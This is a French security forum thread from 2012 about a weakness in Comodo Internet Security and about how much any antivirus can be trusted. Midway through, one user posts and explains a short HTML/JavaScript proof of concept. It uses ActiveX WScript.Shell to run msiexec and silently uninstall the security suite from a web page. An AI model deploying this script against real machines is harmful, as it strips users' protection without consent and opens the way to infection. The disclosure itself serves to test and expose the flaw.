169 replies to this topic

[Hanibal]

Lambda ? Qui m'a appelé ?

[lilidurhone]

Merci Vigen pour le test
Bah là c'est un peu plus clair plus de comodo
Par contre ayant google chrome(qui lui normalement bloque le script) et firefox avec noscript y a t-il un risque car je n'ai pas envie de changer d'antivirus(marre de changer à chaque fois!=
Moi du coup je ne sais plus quoi faire

[EboO]

Je pense que vous faites fausse route : ce script n'a pas à vocation de démontrer que comodo est une daube, juste de prouver qu'il ne faut pas l'encenser.
Chercher une protection qui évitera cette attaque c'est bien, mais déjà il semblerait que beaucoup de logiciels soient concernés et en plus ils auront aussi leurs faiblesses.
La seule chose c'est que quand on mise un bon de sa communication sur le buzz il faut s'attendre à un retour assez raide quand on trouve une faille. Une leçon gratuite pour comodo en somme.

[spywar]

tout à fait d'accord avec toi EboO ici on démontre une faille que beaucoup d'éditeurs devraient être concernés, donc changer d'AV sert strictement à rien tout comme changer d'AV parceque tel AV bloque 9/10 des url testés x jour ... Et hop le lendemain il fail totalement il bloque 3/10 des url donc bon ...

[noisette]

Fut un temps, un météore est passé sur ce forum, un gars vraiment très brillant.

C'était un temps où Avira était vraiment conseillable en gratuit,
avast était aux fraises, les autres tenaient le panier, seul Avira sortait du lot des gratuits.

Cette personne s'est amusé à percer Avira, cela ne lui a pas trop posé de problème, il avait même proposé son POC avec une GUI. .

Le vache.


Il ne nous a alors jamais déconseillé Avira, juste conseillé d'éviter de le porter aux nues.


Et puis il a continué sa route.

[lilidurhone]

merci à vous tous
sur un autre forum on m oblige presque à changer ppur mettré mse hors de question
je garde comodo un. c'est tout
désolé pour les fautes postanr sous Android galère

[brandodu31]

hello noisette

et qui sur ce forum a été infecté avec avira ?
tout antivirus a ses faiblesses , les utilisateurs avertis de VSM comblent ses faiblesses par d autres defenses ,
à l époque , le couple avira+comodo tenait le haut du pavé , personne d infecté ,
et pourtant pas de boucliers web et de sandbox, et les payants faisaient moins bien .
les lecteurs de forum ne sont pas ceux qui sont en danger.

[nenette58]

Merci Vigen pour le test
Bah là c'est un peu plus clair plus de comodo
Par contre ayant google chrome(qui lui normalement bloque le script) et firefox avec noscript y a t-il un risque car je n'ai pas envie de changer d'antivirus(marre de changer à chaque fois!=
Moi du coup je ne sais plus quoi faire

Aucun Antivirus n'est fiable à 100%, c'est une aberration de le croire. Tous ont leur point faible et tous les tests effectués ne donnent qu'une image à un moment donné.
Multiplier les protections et/ou les changer à cause de tel test négatif n'est pas une solution, bien au contraire.

Comment fais-tu pour supporter NoScript ?? Perso, je l'ai viré au bout de 10mn d'utilisation tellement il m'a pris la tête

Je pense que vous faites fausse route : ce script n'a pas à vocation de démontrer que comodo est une daube, juste de prouver qu'il ne faut pas l'encenser.
Chercher une protection qui évitera cette attaque c'est bien, mais déjà il semblerait que beaucoup de logiciels soient concernés et en plus ils auront aussi leurs faiblesses.
La seule chose c'est que quand on mise un bon de sa communication sur le buzz il faut s'attendre à un retour assez raide quand on trouve une faille. Une leçon gratuite pour comodo en somme.

Je te rejoins dans ton analyse

Ce message a été modifié par nenette58 - 29 novembre 2012 - 10:00 .

[Th-Crown]

J'ai eu pas mal de clients infectés sous Avira, mais aussi sous Norton, MSE, AVG, AVAST, Nod32, Bitdefender, Comodo (ma femme, mais cela n'était pas des méchants). Sous Kaspersky,, 2, mais j'ai peu de clients sous Kaspersky, et Dr.Web jamais, car je ne connais personne sous Dr,Web.

Perso, moi Noscript, j'aime, et il est sur tous mes PCS, mais pas question que je l'installe sur le pc de ma femme ou celui de son fils, sinon je me fais tuer.

[tma86]

C'est là que tu te trompes, il suffit de regarder quelques behavior blocker ou hids qui existe sur le marché. Aucun compromis n'est fait dans ce cas.

Et bien justement, un behavior blocker est-il aussi puissant qu'un HIPS? Pour moi pas forcement car cela dépend de la pertinence des règles comportementales implantées dans le BB à un instant donné (un HIPS pur est plus a même de stopper un malware d'une nouvelle famille (au comportement inconnu) qu'un BB même si ce n'est pas chose impossible pour ce dernier).

De mon point de vue, il s'agit bien là d'un compromis (facilité d'utilisation VS puissance de protection): un BB étant une sorte de HIPS automatisé il est en général plus facile d'utilisation mais potentiellement moins puissant.

Après, rentre en jeu aussi les problèmes de performance où il y a aussi des compromis à faire mais c'est une autres histoire.


D'ailleurs ca serait intéressant de faire une comparaison dans vos tests experts d'un hips et d'un BB avec un code inconnu (defensewall VS manutu ???) lol

[Shaoran]

Par contre ayant google chrome(qui lui normalement bloque le script)

Ah ?! Bon.

Je pense que vous faites fausse route : ce script n'a pas à vocation de démontrer que comodo est une daube, juste de prouver qu'il ne faut pas l'encenser.

+1, et Vigen n'ira pas dire l'inverse, c'était son but premier.

Chercher une protection qui évitera cette attaque c'est bien, mais déjà il semblerait que beaucoup de logiciels soient concernés et en plus ils auront aussi leurs faiblesses.

+2

Mais surtout penser avant tout que forcement on aura un cas où tout sera dépassé par une menace, donc il est inutile de chercher la protection suprême et chercher à avoir une usine de plusieurs utilitaires au prix de grosse consommation sur le poste ou de nuisances au niveau des alertes.

tout à fait d'accord avec toi EboO ici on démontre une faille que beaucoup d'éditeurs devraient être concernés, donc changer d'AV sert strictement à rien tout comme changer d'AV parceque tel AV bloque 9/10 des url testés x jour ... Et hop le lendemain il fail totalement il bloque 3/10 des url donc bon ...

+10

Et bien justement, un behavior blocker est-il aussi puissant qu'un HIPS? Pour moi pas forcement car cela dépend de la pertinence des règles comportementales implantées dans le BB à un instant donné (un HIPS pur est plus a même de stopper un malware d'une nouvelle famille (au comportement inconnu) qu'un BB même si ce n'est pas chose impossible pour ce dernier).

Je suis partiellement d'accord. En effet, les hids on un soucis le manque de règles et d'actions prédéfinies, c'est leur gros soucis à l'heure actuelle. Par contre meilleur qu'un hips ? N'oublie pas que l'utilisateur agit sur un hips alors que c'est tout en automatique sur un hids. De fait, si tu bloques tout certes, mais en général, on autorise

D'ailleurs ca serait intéressant de faire une comparaison dans vos tests experts d'un hips et d'un BB avec un code inconnu (defensewall VS manutu ???) lol

Il faudra que tu demandes à Vigen pour ça, par contre de point de vue de conception, je sais que je suis plus vite bridé avec un hids qu'un hips surtout s'il est efficace.

[manzai]

................. donc changer d'AV sert strictement à rien tout comme changer d'AV parceque tel AV bloque 9/10 des url testés x jour ... Et hop le lendemain il fail totalement il bloque 3/10 des url donc bon ...

Chacun fait ce qui veut sur son PC

[spywar]

J'ai dit le contraire ? Après si tu veux changer d'AV tous les 2 jours c'est toi qui voit en effet .. J'ai mon pc sous Windows Vista 64 bit depuis 2008 j'avais Avira puis Comodo Internet Security depuis la v4 et depuis aucun changements ...

[manzai]

J'ai dit le contraire ? Après si tu veux changer d'AV tous les 2 jours c'est toi qui voit en effet .. J'ai mon pc sous Windows Vista 64 bit depuis 2008 j'avais Avira puis Comodo Internet Security depuis la v4 et depuis aucun changements ...

T'oublies les passages quand tu étais sur Panda Cloud et Kingsoft

Je n'interviendrais plus sur ce sujet, sur ce, bonsoir.

[Shaoran]

Aller, comme j'en ai marre de ce que je lis ici et là, je dévoile le script, j'en ai d'autre de toute façon.

 

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">
 
<html>
<head>
<script language="JavaScript" type="text/javascript">
 
function run()
{
var wshShell = new ActiveXObject("WScript.Shell");
wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);
}
 
</script>
</head>
<input type="button" value="Lancer" onclick="run()">
</body>
</html>

 

Cette section {E62381A7-B1C1-4121-8262-84D38C77786C} doit correspondre à votre version, vous le verrez dans le lien de désinstallation de CIS en l'éditant.

 

Je pense que les plus connaisseurs rigoleront bien de ce truc, moi même je trouve ça lamentable à la base. Au pire j’essaierai de faire mieux la prochaine fois.

C'est déjà publié chez comodo est d'autre, bon je sais qu'ils vont corriger ça très vite sans avoir compris le point derrière comme il y a deux ans, mais bon, on ne pourra pas dire que j'y ai mis de la mauvaise volonté.

[EboO]

Je n'y connais rien mais je trouve que le code est très court

[Shaoran]

Grosomodo pour les non initiés, c'est juste une page html, et j'ai mis un bouton pour ne pas le lancer quand la page s'ouvre.

En fait le code est là :

 

var wshShell = new ActiveXObject("WScript.Shell");

 

Je demande la création d'un activeX qui va appeler le shell (ou les commandes propre à Windows si vous préférez) pour pouvoir lancer un programme.

 

wshShell.Run("C:\\WINDOWS\\system32\\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart", 1, true);

 

Et là je lance le programme de désinstallation de Comodo en silencieux et sans redémarrage.

Ce message a été modifié par Shaoran - 30 novembre 2012 - 19:11 .

[EboO]

Ça va les occuper deux minutes sur le forum de comodo, même si la mauvaise foi fait déjà son apparition...

[Hanibal]

Argh... Un script si simple (non pas que je m'y connaisses, mais je m'attendais tout de même à qqch de bcp plus long et complexe !!!) qui arrive à mettre HS une suite de sécurité... Ça laisse craindre le pire quand à toutes les possibilités qui sont entre les mains de gens compétents et mal intentionnés...

[tma86]

lol voui je me doutais bien qu'il s'agissait d'une attaque de désinstallation. Peu de produit passeraient ce test d'après ce que j'avais lu ici et là il y a quelques années

[Tchim]

Salut,

 

Félicitations Shaoran

 

C'est quoi comme langage pour le script ?

 

Si j'ai bien compris, il s'agit d'une faille du logiciel contre une "terminaison" un "kill" comme avec "Process Explorer" ou "Process Hacker" non ?

Suivit d'une "désinstallation" via un tiers (dans ce cas : le script) ?

 

@+

[le barbier fou]

C'est du javascript.

En gros, si je ne m'abuse, le script revient à faire exécuter la commande C:\WINDOWS\system32\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart (désinstallation silencieuse) par Internet Explorer (via un ActiveX). Même pas de "kill" ou de faille dans l'autodéfense. CIS accorde une confiance totale aux navigateurs, donc ne bronche pas, se laisse désinstaller gentiment. C'est effrayant. ^^

 

Un modérateur a fermé le topic sur le forum de Comodo, demandant à ce qu'on lui envoie une preuve s'il en existe (alors que le script a été posté et testé par des membres quelques messages au-dessus). L'utilisation d'une sandbox me semble essentielle pour les utilisateurs de Comodo. Qu'en est-il de Virtual Kiosk à ce sujet ? Il ne devrait pas être soumis au même problème, non ?

[Shaoran]

lol voui je me doutais bien qu'il s'agissait d'une attaque de désinstallation. Peu de produit passeraient ce test d'après ce que j'avais lu ici et là il y a quelques années

 

Ouais enfin, auparavant je virais les fichiers moi même, mais je trouve ça plus rapide, Comodo a une auto défense à chier, il ferait bien de copier OA sur ce point, eux par contre, la merde pour faire quoi que ce soit sur lui ... Enfin ça fait un bail que je n'ai pas retesté mais à mon avis ça n'a pas du changé des masses depuis.

 

 

C'est du javascript.

En gros, si je ne m'abuse, le script revient à faire exécuter la commande C:\WINDOWS\system32\msiexec.exe /x{E62381A7-B1C1-4121-8262-84D38C77786C} /quiet /norestart (désinstallation silencieuse) par Internet Explorer (via un ActiveX). Même pas de "kill" ou de faille dans l'autodéfense. CIS accorde une confiance totale aux navigateurs, donc ne bronche pas, se laisse désinstaller gentiment. C'est effrayant. ^^

 

Un modérateur a fermé le topic sur le forum de Comodo, demandant à ce qu'on lui envoie une preuve s'il en existe (alors que le script a été posté et testé par des membres quelques messages au-dessus). L'utilisation d'une sandbox me semble essentielle pour les utilisateurs de Comodo. Qu'en est-il de Virtual Kiosk à ce sujet ? Il ne devrait pas être soumis au même problème, non ?

 

Oui il n'y a pas de kill, le programme de désinstallation s'en occupe. Par contre la confiance de Comodo ne s’arrête pas aux navigateurs, mais à tous les programmes de la whitelist. Il suffirai de se faufiler par une faille de sécu et cela marcherai.

 

Après de toute façon, ils s'en foutent, ils ont toutes les données mais ils reprennent le même raisonnement qu'avant, on nie en bloc. Pour l'instant c'est peu fréquemment exploité voir pas du tout, c'est du genre, tu gardes les bijoux de la reine d’Angleterre avec un sol sensible à la pression, il y a un long couloir non protégé, pour l'instant personne l'a utilisé ils sont passés à coté, ba, on reste ainsi, on verra ensuite <<

 

Virtual kiosk, c'est leur bêta actuelle non ? Si c'est le cas il y a déjà la réponse, il arrête rien. Seul moyen efficace contre cette faille, c'est le mode parano. Après pour leurs autre outils, je n'ai pas pris le temps de le tester moi même et pas vraiment l'envie.

[le barbier fou]

Pas de Whitelist sur ce coup là !!

 

Ah bah tu vois. 

 

Par contre la confiance de Comodo ne s’arrête pas aux navigateurs, mais à tous les programmes de la whitelist.

 

 

Le Virtual Kiosk est l'environnement virtuel inclus dans la version 6, mais il faut le lancer manuellement. Je ne pense pas qu'on puisse le bypasser de la même façon.

[Tchim]

OK, merci pour les explications

[tma86]

C'est vraiment pas professionnel du tout de fermer un fils de discussion comme ca sur leur forum... parque la vérité leur déplais... Même si cela n'engage que moi, ca me donne vraiment pas confiance quant au sérieux de cette société

[Thelwin Argon]

Non mais j'hallucine ^^'

 

Moi qui pensait que l'époque des failles ActiveX aussi basiques était révolue

 

D'ailleurs c'est étonnant que les ActiveX ne soient pas automatique sandboxé par Comodo, ne serait-ce que par principe.

[Shaoran]

De même que pour d'autre, je viens de faire un test rapide avant de répondre avec OA premium, c'est pas mieux.

[EboO]

Tu veux bien nous poster les résultats des produits testés ? J'insiste mais si tu fais defensewall fais connaître le résultat stp.

[Shaoran]

Defensewall sandbox tout, donc logiquement cela ne marchera pas.

J'ai toutefois testé rapidement, à la base j'ai été étonné qu'il lance un cmd, j'ai donc testé son désinstallateur ce qui a échoué. L raison est simple, le cmd est effectivement lancé, mais en sandbox ce que j'ai vu après. Donc comme prévisible, cela ne marche pas avec ce logiciel.

C'est ce qui est pratique avec cette faille c'est qu'au final il faut penser comme le fonctionnement du logiciel et ensuite on peut savoir ce qu'il fera avant même de faire le test.